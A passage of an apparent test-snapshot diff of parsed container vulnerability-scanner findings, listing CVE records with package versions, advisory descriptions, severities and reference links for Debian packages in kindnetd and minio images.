"value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23218", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23218", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", - "https://linux.oracle.com/cve/CVE-2022-23218.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23218", - "https://www.oracle.com/security-alerts/cpujul2022.html", - ], - }, - "category": "Vulnerability", - "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23218", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23218", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libuuid1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23219", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4899", + "installedVersion": "1.4.8+dfsg-2.1", + "packageName": "libzstd1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23219", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", - "https://linux.oracle.com/cve/CVE-2022-23219.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23219", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2022-4899", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "https://github.com/facebook/zstd/issues/3200", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "https://www.cve.org/CVERecord?id=CVE-2022-4899", ], }, "category": "Vulnerability", - "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", + "name": "buffer overrun in util.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23219", + "value": "https://avd.aquasec.com/nvd/cve-2022-4899", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23219", + "value": "https://access.redhat.com/security/cve/CVE-2022-4899", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", + "value": "https://github.com/facebook/zstd/issues/3200", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", + ], + }, + "category": "Vulnerability", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://issues.rpath.com/browse/RPL-1825", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1751", - "installedVersion": "2.28-10", - "packageName": "libc6", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1751", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", - "https://linux.oracle.com/cve/CVE-2020-1751.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200430-0002/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", ], }, "category": "Vulnerability", - "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: array overflow in backtrace functions for powerpc", + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1751", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1751", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "value": "https://ubuntu.com/security/notices/USN-5745-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5745-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1752", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1752", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", - "https://linux.oracle.com/cve/CVE-2020-1752.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", - "https://security.gentoo.org/glsa/202101-20", - "https://security.netapp.com/advisory/ntap-20200511-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", ], }, "category": "Vulnerability", - "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: use-after-free in glob() function when expanding ~user", + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1752", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1752", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + }, + { + "type": "URL", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-6096", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "mount", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-6096", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/attachment.cgi?id=12334", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", - "https://ubuntu.com/security/notices/USN-4954-1", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2020-6096", - "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-6096", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-6096", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "6.2+20201114-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "ncurses-base", + "references": [ + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", + ], + }, + "category": "Vulnerability", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "ncurses: segfaulting OOB read", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + 